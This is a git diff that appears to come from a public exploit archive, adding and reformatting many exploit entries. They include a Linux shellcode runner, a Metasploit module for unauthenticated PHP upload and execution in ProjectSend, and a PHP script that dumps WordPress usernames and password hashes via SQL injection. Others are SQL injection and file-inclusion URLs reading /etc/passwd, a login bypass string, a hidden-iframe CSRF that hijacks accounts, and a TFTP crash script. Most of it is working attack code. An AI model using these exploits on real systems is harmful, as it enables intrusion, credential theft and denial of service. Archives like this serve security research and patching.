+"\x31\xc0\x50\x68\x6f\x6c\x68\x6f\x68\x68\x6f\x6c\x68\x68\x2f\x68\x6f\x6c\x68\x2f\x74\x6d\x70\x89\xe3\xb0\x28\xcd\x80\x31\xc0\x89\xc3\xb0\x01\xcd\x80"; + +main() { + + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} diff --git a/platforms/multiple/remote/19118.txt b/platforms/multiple/remote/19118.txt new file mode 100755 index 000000000..ce01860fa --- /dev/null +++ b/platforms/multiple/remote/19118.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/149/info + +Microsoft IIS and other NT webservers contain a vulnerability that allows remote users to obtain the source code for an ASP file. When one appends ::$DATA to an asp being requested, the ASP source will be returned, instead of executing the ASP. For example: http://xyz/myasp.asp::$DATA will return the source of myasp.asp, instead of executing it. + +The following proof of concept was provided: + +http://xyz/myasp.asp::$DATA + +This will cause IIS to disclose the contents of the page, myasp.asp, to an attacker. \ No newline at end of file diff --git a/platforms/php/remote/35660.rb b/platforms/php/remote/35660.rb new file mode 100755 index 000000000..311a6db50 --- /dev/null +++ b/platforms/php/remote/35660.rb @@ -0,0 +1,166 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => 'ProjectSend Arbitrary File Upload', + 'Description' => %q{ + This module exploits a file upload vulnerability in ProjectSend + revisions 100 to 561. The 'process-upload.php' file allows + unauthenticated users to upload PHP files resulting in remote + code execution as the web server user. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Fady Mohammed Osman', # Discovery and Exploit + 'Brendan Coles ' # Metasploit + ], + 'References' => + [ + ['EDB', '35424'] + ], + 'Payload' => + { + 'BadChars' => "\x00" + }, + 'Arch' => ARCH_PHP, + 'Platform' => 'php', + 'Targets' => + [ + # Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu) + ['ProjectSend (PHP Payload)', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Dec 02 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/']) + ], self.class) + end + + # + # Checks if target upload functionality is working + # + def check + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'process-upload.php') + ) + if !res + vprint_error("#{peer} - Connection timed out") + return Exploit::CheckCode::Unknown + elsif res.code.to_i == 404 + vprint_error("#{peer} - No process-upload.php found") + return Exploit::CheckCode::Safe + elsif res.code.to_i == 500 + vprint_error("#{peer} - Unable to write file") + return Exploit::CheckCode::Safe + elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/ + vprint_error("#{peer} - File process-upload.php is not executable") + return Exploit::CheckCode::Safe + elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/ + vprint_error("#{peer} - Software is misconfigured") + return Exploit::CheckCode::Safe + elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/ + # response on revision 118 onwards includes the file name + if res.body && res.body =~ /NewFileName/ + return Exploit::CheckCode::Vulnerable + # response on revisions 100 to 117 does not include the file name + elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/ + return Exploit::CheckCode::Appears + elsif res.body && res.body =~ /Failed to open output stream/ + vprint_error("#{peer} - Upload folder is not writable") + return Exploit::CheckCode::Safe + else + return Exploit::CheckCode::Detected + end + else + return Exploit::CheckCode::Safe + end + end + + # + # Upload PHP payload + # + def upload + fname = "#{rand_text_alphanumeric(rand(10) + 6)}.php" + php = "" + data = Rex::MIME::Message.new + data.add_part(php, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{fname}")) + post_data = data.to_s + print_status("#{peer} - Uploading file '#{fname}' (#{php.length} bytes)") + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "process-upload.php?name=#{fname}"), + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => post_data + ) + if !res + fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading") + elsif res.code.to_i == 404 + fail_with(Failure::NotFound, "#{peer} - No process-upload.php found") + elsif res.code.to_i == 500 + fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}") + elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/ + fail_with(Failure::NotVulnerable, "#{peer} - Upload folder is not writable") + elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/ + fail_with(Failure::NotVulnerable, "#{peer} - File process-upload.php is not executable") + elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/ + fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured") + # response on revision 118 onwards includes the file name + elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/ + print_good("#{peer} - Payload uploaded successfully (#{fname})") + return fname + # response on revisions 100 to 117 does not include the file name + elsif res.code.to_i == 200 && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/ + print_warning("#{peer} - File upload may have failed") + return fname + else + vprint_debug("#{peer} - Received response: #{res.code} - #{res.body}") + fail_with(Failure::Unknown, "#{peer} - Something went wrong") + end + end + + # + # Execute uploaded file + # + def exec(upload_path) + print_status("#{peer} - Executing #{upload_path}...") + res = send_request_raw( + { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5 + ) + if !res + print_status("#{peer} - Request timed out while executing") + elsif res.code.to_i == 404 + vprint_error("#{peer} - Not found: #{upload_path}") + elsif res.code.to_i == 200 + vprint_good("#{peer} - Executed #{upload_path}") + else + print_error("#{peer} - Unexpected reply") + end + end + + # + # upload && execute + # + def exploit + fname = upload + register_files_for_cleanup(fname) + exec("upload/files/#{fname}") # default for r-221 onwards + unless session_created? + exec("upload/temp/#{fname}") # default for r-100 to r-219 + end + end +end \ No newline at end of file diff --git a/platforms/php/webapps/35584.txt b/platforms/php/webapps/35584.txt new file mode 100755 index 000000000..56c1431e8 --- /dev/null +++ b/platforms/php/webapps/35584.txt @@ -0,0 +1,52 @@ + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + INDEPENDENT SECURITY RESEARCHER + PENETRATION TESTING SECURITY + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + + +# Exploit Title: GQ File Manager - Sql Injection - Cross Site Scripting Vulnerability's +# Date: 19/12/2014 +# Url Vendor: http://installatron.com/phpfilemanager +# Vendor Name: GQ File Manager +# Version: 0.2.5 +# CVE: CVE-2014-1137 +# Author: TaurusOmar +# Tiwtter: @TaurusOmar_ +# Email: taurusomar13@gmail.com +# Home: overhat.blogspot.com +# Tested On: Bugtraq Optimus +# Risk: High + +Description +GQ File Manager is a lightweight file manager that enables files to be uploaded to and downloaded from a server directory. GQ File Manager is great for creating and maintaining a simple cloud-based repository of files that can be accessed from anywhere on the Internet. + +------------------------ ++ CROSS SITE SCRIPTING + +------------------------ +# Exploiting Description - Created new file example:("xss.html")in the document insert code xss + +Input: +"> +Output: +
+Warning: fread() [function.fread]: Length parameter must be greater than 0 in /home/u138790842/public_html/gp/incl/edit.inc.php on line 44
+"> + +#P0c +"> + +#Proof Concept +http://i.imgur.com/cjIvR5l.jpg + + +------------------------ ++ Sql Injection + +------------------------ +# Exploiting Description - The Sql Injection in path created a new file. + +#P0c +http://site.com/GQFileManager/index.php?&&output=create&create=[sql] + +#Proof Concept +http://i.imgur.com/IJZoDVt.jpg + diff --git a/platforms/php/webapps/35591.txt b/platforms/php/webapps/35591.txt new file mode 100755 index 000000000..a35ecaff6 --- /dev/null +++ b/platforms/php/webapps/35591.txt @@ -0,0 +1,69 @@ +################################################################################################## +#Exploit Title : phpMyRecipes 1.2.2 SQL injection(page browse.php, parameter category) +#Author : Manish Kishan Tanwar +#Download Link : http://prdownloads.sourceforge.net/php-myrecipes/phpMyRecipes-1.2.2.tar.gz?download +#Date : 23/12/2014 +#Discovered at : IndiShell Lab +# Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti +# email : manish.1046@gmail.com +################################################################################################## + +//////////////////////// +/// Overview: +//////////////////////// + + +phpMyRecipes is a simple application for storing and retrieving recipes. +It uses a web-based interface, for ease of use across any system, and a MySQL database backend for storing the recipes. +/////////////////////////////// +// Vulnerability Description: +/////////////////////////////// +vulnerability is due to parameter category in browse.php +parameter category is passing to function GetCategoryNameByID without data filtering and due to it, SQL injection vulnerability is arising. + +from line 38 to 56 + + $category = $_GET['category']; + } + + $session = getsession(); + + c_header("Browse Recipes", "browse"); + + # Build a category string + $cat = $category; + $catstr = ""; + while ($cat != 1) { + if ($catstr == "") { + $catstr = "" . GetCategoryNameByID($cat) . "" . $catstr; + } else { + $catstr = "" . GetCategoryNameByID($cat) . " > " . $catstr; + } + + $cat = GetCategoryParentByID($cat); + } + + +//////////////// +/// POC //// +/////////////// + +POC image=http://oi57.tinypic.com/inv3ol.jpg + payload for extracting database name + set value of category parameter to 1 and add error based SQL injection payload to url + +http://127.0.0.1/pr/browse.php?category=1 and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) + + + --==[[ Greetz To ]]==-- +############################################################################################ +#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, +#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, +#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, +#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das +############################################################################################# + --==[[Love to]]==-- +# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, +#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik) + --==[[ Special Fuck goes to ]]==-- + <3 suriya Cyber Tyson <3 diff --git a/platforms/php/webapps/35626.txt b/platforms/php/webapps/35626.txt new file mode 100755 index 000000000..5613f11b2 --- /dev/null +++ b/platforms/php/webapps/35626.txt @@ -0,0 +1,13 @@ +Exploit Title: Easy File Sharing Webserver =>6.8 Persistent XSS +Date: 12/26/14 +Exploit Author: SickPsycko +Vendor Homepage: http://www.sharing-file.com/ +Version:6.8 +Tested on: Windows 7 32bit + +The exploit is within the username field. +So to exploit this vulnerability, One must place the payload into the +specified field when registering. + +http://i.imgur.com/bibu81C.png +Once logged in. User will be greeted with such. diff --git a/platforms/php/webapps/35653.txt b/platforms/php/webapps/35653.txt new file mode 100755 index 000000000..4d2618199 --- /dev/null +++ b/platforms/php/webapps/35653.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/47552/info + +Nuke Evolution Xtreme is prone to a local file-include vulnerability and an SQL-injection vulnerability. + +An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process. + +The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Nuke Evolution Xtreme 2.0 is vulnerable; other versions may also be affected. + + +http://www.example.com/[path]/modules.php?name=Surveys&op=results&pollID=3+and+1=2+union+select+1,version(),3,4,5-- +http://www.example.com/[path]/modules.php?name=News&file=../../../../../../../../../../etc/passwd%00 +http://www.example.com/[path]/modules.php?name=Private_Messages&file=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/35655.txt b/platforms/php/webapps/35655.txt new file mode 100755 index 000000000..ce32d849f --- /dev/null +++ b/platforms/php/webapps/35655.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47569/info + +TemaTres is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +TemaTres 1.3 is vulnerable; prior versions may also be affected. + +http://www.example.com/tematres1.3/vocab/index.php?_search_expresions=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35657.php b/platforms/php/webapps/35657.php new file mode 100755 index 000000000..89450f4c4 --- /dev/null +++ b/platforms/php/webapps/35657.php @@ -0,0 +1,67 @@ +source: http://www.securityfocus.com/bid/47574/info + +The Sermon Browser plugin for WordPress is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Sermon Browser 0.43 is vulnerable; other versions may also be affected. + +alert(0) +# FPD : http://site/wp/wp-content/plugins/sermon-browser/sermon.php + + -==[ Start ]==- + +"); + +$t=array("db_usr"=>"user()","db_ver"=>"version()","db_nam"=>"database()","usr_nm"=>"user_login","passwd"=>"user_pass"); + +function text2hex($string) { + $hex = ''; + $len = strlen($string) ; + for ($i = 0; $i < $len; $i++) { + $hex .= str_pad(dechex(ord($string[$i])), 2, 0, STR_PAD_LEFT); + } + return $hex; +} + +foreach($t as $r=>$y){ + +$x=@file_get_contents($argv[1]."?sermon_id=-1/**/UnIoN/**/SeLeCt/**/group_concat(0x".text2hex("<$r>").",$y,0x".text2hex("<$r>")."),2+from+wp_users+where+ID=1--"); + +preg_match_all("{<$r>(.*?)<$r>}i",$x, $dz); + +echo $u = ($dz[1][0]) ? "[-] $r : ".$dz[1][0]."\n" : "[-] $r : Failed !\n"; + +} + +print_r(" + -==[ Finished ]==- +"); + +# By Lagripe-Dz .. ! +# END .. ! + +?> diff --git a/platforms/php/webapps/35658.txt b/platforms/php/webapps/35658.txt new file mode 100755 index 000000000..a90700b6c --- /dev/null +++ b/platforms/php/webapps/35658.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47576/info + +html-edit CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +html-edit CMS 3.1.9 is vulnerable; other versions may also be affected. + +http://www.example.com/[Path]/addons/image_slider/index.php?html_output=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/35659.txt b/platforms/php/webapps/35659.txt new file mode 100755 index 000000000..c4bccd796 --- /dev/null +++ b/platforms/php/webapps/35659.txt @@ -0,0 +1,19 @@ +# Exploit Title: Social Microblogging PRO 1.5 Stored XSS Vulnerability +# Date: 29-12-2014 +# Exploit Author: Halil Dalabasmaz +# Version: v1.5 +# Vendor Homepage: +http://codecanyon.net/item/social-microblogging-pro/9217005 +# Tested on: Chrome & Iceweasel + +# Vulnerability Description: + +===Stored XSS=== +"Web Site" input is not secure at Profile section. You can run XSS payloads +on "Web Site" input. + +Sample Payload for Stored XSS: http://example.com/">[xssPayload] + +=Solution= +Filter the input field against to XSS attacks. +================ diff --git a/platforms/php/webapps/3862.txt b/platforms/php/webapps/3862.txt index 1f5ee7995..48436e84b 100755 --- a/platforms/php/webapps/3862.txt +++ b/platforms/php/webapps/3862.txt @@ -1,16 +1,16 @@ -================================================= -+ -+ Xoops wfquotes module v1.0 0 Remote Blind SQL Injection -+ -================================================= -+ -+ Bulan: Cyber-Ssecurity -+ -================================================= -+ -+ Exploit: -+ /modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/**/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/* -+ -================================================= - -# milw0rm.com [2007-05-06] +================================================= ++ ++ Xoops wfquotes module v1.0 0 Remote Blind SQL Injection ++ +================================================= ++ ++ Bulan: Cyber-Ssecurity ++ +================================================= ++ ++ Exploit: ++ /modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/**/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/* ++ +================================================= + +# milw0rm.com [2007-05-06] diff --git a/platforms/php/webapps/7333.txt b/platforms/php/webapps/7333.txt index 96162eb93..5f7e3e370 100755 --- a/platforms/php/webapps/7333.txt +++ b/platforms/php/webapps/7333.txt @@ -1,55 +1,55 @@ - +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - + + - + Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability + - + + - + Discovered by b3hz4d + - + + - + WwW.DeltaHacking.Net + - + + - + + - + + - +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - - - APA Center of Yazd University - (https://www.ircert.cc) - - -AUTHOR : b3hz4d (Seyed Behzad Shaghasemi) -DATE : 03 Dec 2008 -SITE : WwW.DeltaHacking.Net -CONTACT: behzad_sh_66@yahoo.com - -##################################################### - -APPLICATION : Web Based Contact Management -DOWNLOAD(199$): http://www.aliensoftcorp.com/contactmanager.htm -VENDOR : http://www.aliensoftcorp.com/ -DEMO : http://www.aliensoftcorp.com/contactmanager.htm - -##################################################### - - -[+] vuln : - - Admin login page - - All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable. - - All Demo links are here: - - http://www.aliensoftcorp.com/contactmanager.htm - -[+] Exploit : - USER: anything - - PASS: delta' or 'a'='a - - -########################################################################################################## - -# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com # - -########################################################################################################## - -# milw0rm.com [2008-12-03] + +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + + + Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability + + + + + + Discovered by b3hz4d + + + + + + WwW.DeltaHacking.Net + + + + + + + + + + + +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + APA Center of Yazd University + (https://www.ircert.cc) + + +AUTHOR : b3hz4d (Seyed Behzad Shaghasemi) +DATE : 03 Dec 2008 +SITE : WwW.DeltaHacking.Net +CONTACT: behzad_sh_66@yahoo.com + +##################################################### + +APPLICATION : Web Based Contact Management +DOWNLOAD(199$): http://www.aliensoftcorp.com/contactmanager.htm +VENDOR : http://www.aliensoftcorp.com/ +DEMO : http://www.aliensoftcorp.com/contactmanager.htm + +##################################################### + + +[+] vuln : + + Admin login page + + All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable. + + All Demo links are here: + + http://www.aliensoftcorp.com/contactmanager.htm + +[+] Exploit : + USER: anything + + PASS: delta' or 'a'='a + + +########################################################################################################## + +# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com # + +########################################################################################################## + +# milw0rm.com [2008-12-03] diff --git a/platforms/php/webapps/7557.txt b/platforms/php/webapps/7557.txt index 02de545c4..60a657289 100755 --- a/platforms/php/webapps/7557.txt +++ b/platforms/php/webapps/7557.txt @@ -1,40 +1,40 @@ -PHPmotion <= 2.1 CSRF vulnerability - -Author: Ausome1 -Email: Ausorme1@gmail.com -Website: http://www.enigmagroup.org -Description: Change a member's password and/or email. ---------------------------------------------------------------------------------------------------- - - -Social engineer a PHPMotion member to come to your web page with the following hidden iframe on -there, which pulls in the evil script from pwned.html. This will change the victim's password and email, -using their credentials. - -We use a hidden iframe so the victim doesn't know their password was changed till it's to late. In -the pwned.html file I recreated the form on the PHPMotion change password/email. Javascript is used -to submit the form on page load. - -Hidden iframe code: - - - - -Source of pwned.html file: - - - - -
- - - - -
- - - -Once your victim has visited your evil page, You may now be able to log into their PHPMotion account, -using password "password123" and their email will be "NotYourEmail@anymore.com". - -# milw0rm.com [2008-12-23] +PHPmotion <= 2.1 CSRF vulnerability + +Author: Ausome1 +Email: Ausorme1@gmail.com +Website: http://www.enigmagroup.org +Description: Change a member's password and/or email. +--------------------------------------------------------------------------------------------------- + + +Social engineer a PHPMotion member to come to your web page with the following hidden iframe on +there, which pulls in the evil script from pwned.html. This will change the victim's password and email, +using their credentials. + +We use a hidden iframe so the victim doesn't know their password was changed till it's to late. In +the pwned.html file I recreated the form on the PHPMotion change password/email. Javascript is used +to submit the form on page load. + +Hidden iframe code: + + + + +Source of pwned.html file: + + + + +
+ + + + +
+ + + +Once your victim has visited your evil page, You may now be able to log into their PHPMotion account, +using password "password123" and their email will be "NotYourEmail@anymore.com". + +# milw0rm.com [2008-12-23] diff --git a/platforms/windows/dos/1276.html b/platforms/windows/dos/1276.html index cef4e4de4..9c9625edc 100755 --- a/platforms/windows/dos/1276.html +++ b/platforms/windows/dos/1276.html @@ -1,61 +1,61 @@ - - - - - - - - - - -# milw0rm.com [2005-10-28] + + + + + + + + + + +# milw0rm.com [2005-10-28] diff --git a/platforms/windows/dos/1389.html b/platforms/windows/dos/1389.html index 586d742a5..c8ffc1028 100755 --- a/platforms/windows/dos/1389.html +++ b/platforms/windows/dos/1389.html @@ -1,3 +1,3 @@ - - -# milw0rm.com [2005-12-27] +
+ +# milw0rm.com [2005-12-27] diff --git a/platforms/windows/dos/1394.html b/platforms/windows/dos/1394.html index 22ddb74d3..e9262e1d4 100755 --- a/platforms/windows/dos/1394.html +++ b/platforms/windows/dos/1394.html @@ -1,21 +1,21 @@ - - - - -

suntzu

- -# milw0rm.com [2005-12-29] + + + + +

suntzu

+ +# milw0rm.com [2005-12-29] diff --git a/platforms/windows/dos/1598.html b/platforms/windows/dos/1598.html index 2cf12861d..faf1f19fc 100755 --- a/platforms/windows/dos/1598.html +++ b/platforms/windows/dos/1598.html @@ -1,3 +1,3 @@ -

Hello cruel world. - -# milw0rm.com [2006-03-21] +

Hello cruel world. + +# milw0rm.com [2006-03-21] diff --git a/platforms/windows/dos/1604.html b/platforms/windows/dos/1604.html index 1eb81301a..790ab5c1d 100755 --- a/platforms/windows/dos/1604.html +++ b/platforms/windows/dos/1604.html @@ -1,19 +1,19 @@ - - - - - -# milw0rm.com [2006-03-22] + + + + + +# milw0rm.com [2006-03-22] diff --git a/platforms/windows/dos/3272.html b/platforms/windows/dos/3272.html index 84a4c63dd..0f8d27ce0 100755 --- a/platforms/windows/dos/3272.html +++ b/platforms/windows/dos/3272.html @@ -1,40 +1,40 @@ - - - - - AmesianX, RC_No1 in powerhacker.net (amesianx@gmail.com, RC_No1@gmail.com) - - - - - - -# milw0rm.com [2007-02-05] + + + + + AmesianX, RC_No1 in powerhacker.net (amesianx@gmail.com, RC_No1@gmail.com) + + + + + + +# milw0rm.com [2007-02-05] diff --git a/platforms/windows/dos/35654.py b/platforms/windows/dos/35654.py new file mode 100755 index 000000000..f113207eb --- /dev/null +++ b/platforms/windows/dos/35654.py @@ -0,0 +1,38 @@ +source: http://www.securityfocus.com/bid/47561/info + +AT-TFTP is prone to a remote denial-of-service vulnerability. + +Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users. + +AT-TFTP 1.8 is affected; other versions may also be vulnerable. + +#!/usr/bin/python + +############################################################################## +# Exploit : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX +# http://secpod.org/wintftp_dos_poc.py +# Reference : +# Author : Antu Sanadi from SecPod Technologies (www.secpod.com) +# +# Exploit will crash AT-TFTP Server v1.8 Service +# Tested against AT-TFTP Server v1.8 server +############################################################################## + +import socket +import sys + +host = '127.0.0.1' +port = 69 + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +except: + print "socket() failed" + sys.exit(1) + +addr = (host,port)1 + +data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\ + '\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00' +s.sendto(data, (host, port)) + diff --git a/platforms/windows/dos/35656.pl b/platforms/windows/dos/35656.pl new file mode 100755 index 000000000..48e83ce8f --- /dev/null +++ b/platforms/windows/dos/35656.pl @@ -0,0 +1,46 @@ +source: http://www.securityfocus.com/bid/47571/info + +eXPert PDF is prone to a heap-based buffer-overflow vulnerability because it fails to properly bounds check user-supplied data before copying it into an insufficiently sized buffer. + +An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. + +#!/usr/bin/perl +sub logo { +print STDERR << "EOF"; + +1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 +0 _ __ __ __ 1 +1 /' \ __ /'__`\ /\ \__ /'__`\ 0 +0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 +1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 +0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 +1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 +0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 +1 \ \____/ >> Exploit database separated by exploit 0 +0 \/___/ type (local, remote, DoS, etc.) 1 +1 1 +0 [+] Site : 1337day.com 0 +1 [+] Support e-mail : submit[at]1337day.com 1 +0 0 +1 ######################################### 1 +0 I'm KedAns-Dz member from Inj3ct0r Team 1 +1 ######################################### 0 +0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 + +EOF +} +# --------- +# eXPert PDF Editor 7 Professional Heap Proof Of Concept Exploit +# Author : KedAns-Dz +# special thanks to : Inj3ct0r Team + exploit-id Team +# --------- +# Target : eXPert PDF Editor v7.0.880.0 +# Tested in Windows XP sp3 France +# Creating The Bad File .PJ And => Bo0M ! +# Heap 0x0174EC24 in 'vspdfeditor140.bpl' . addres 00000008 +my $PoC = "\x4b\x45\x44\x41\x4e\x53"; # NULL Heap PoC +open (FILE,">> KedAns.pj"); # Bad File Here +print FILE $PoC; +close (FILE); +# KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans + diff --git a/platforms/windows/dos/366.pl b/platforms/windows/dos/366.pl index 959ad827a..a162da41f 100755 --- a/platforms/windows/dos/366.pl +++ b/platforms/windows/dos/366.pl @@ -63,6 +63,6 @@ return $l; ############################# # End code -############################# - -# milw0rm.com [2004-07-24] +############################# + +# milw0rm.com [2004-07-24] diff --git a/platforms/windows/dos/376.html b/platforms/windows/dos/376.html index 9236bc7d3..d766df319 100755 --- a/platforms/windows/dos/376.html +++ b/platforms/windows/dos/376.html @@ -1,5 +1,5 @@

Right Click aOn Me And Click "Save Target As" - - -// milw0rm.com [2004-08-04] + + +// milw0rm.com [2004-08-04] diff --git a/platforms/windows/dos/7431.pl b/platforms/windows/dos/7431.pl index 0db701999..b4418500d 100755 --- a/platforms/windows/dos/7431.pl +++ b/platforms/windows/dos/7431.pl @@ -1,36 +1,36 @@ -#!/usr/bin/perl -# Microsoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object Buffer Overflow (CVE-2008-4255) PoC -# You'll need Debugging Tools for Windows http://www.microsoft.com/whdc/devtools/debugging/default.mspx -# /JA -# Come to FRHACK! -# www.frhack.org - -print "\nMicrosoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object Buffer Overflow (CVE-2008-4255) PoC\n"; -print "Generating malicious .AVI file\n"; -print "This file should be served via an UNC path\n"; -print "[->] Building evil.avi\n"; - -my $shellcode = "http://metasploit.com"; - -$FileHeader = -"\x52\x49\x46\x46\x2C\x08\x00\x00\x41\x56\x49\x20\x73\x74\x72\x68\x10\x00\x00\x00\x76\x69\x64\x73\x20\x20\x20\x20\x00\x00\x00\x00". -"\x00\x00\x00\x00\x73\x74\x72\x66\x00\x08\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; - -open(my $poc, "> evil.avi"); -print $poc $FileHeader; -close($poc); - -print "[->] evil.avi generated\n"; -print "[->] Building evil.html\n"; - -$EvilHTML = -"". -""; - -open(my $poc, "> evil.html"); -print $poc $EvilHTML; -close($poc); - -print "[->] evil.html generated\n"; - -# milw0rm.com [2008-12-12] +#!/usr/bin/perl +# Microsoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object Buffer Overflow (CVE-2008-4255) PoC +# You'll need Debugging Tools for Windows http://www.microsoft.com/whdc/devtools/debugging/default.mspx +# /JA +# Come to FRHACK! +# www.frhack.org + +print "\nMicrosoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object Buffer Overflow (CVE-2008-4255) PoC\n"; +print "Generating malicious .AVI file\n"; +print "This file should be served via an UNC path\n"; +print "[->] Building evil.avi\n"; + +my $shellcode = "http://metasploit.com"; + +$FileHeader = +"\x52\x49\x46\x46\x2C\x08\x00\x00\x41\x56\x49\x20\x73\x74\x72\x68\x10\x00\x00\x00\x76\x69\x64\x73\x20\x20\x20\x20\x00\x00\x00\x00". +"\x00\x00\x00\x00\x73\x74\x72\x66\x00\x08\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; + +open(my $poc, "> evil.avi"); +print $poc $FileHeader; +close($poc); + +print "[->] evil.avi generated\n"; +print "[->] Building evil.html\n"; + +$EvilHTML = +"". +""; + +open(my $poc, "> evil.html"); +print $poc $EvilHTML; +close($poc); + +print "[->] evil.html generated\n"; + +# milw0rm.com [2008-12-12] diff --git 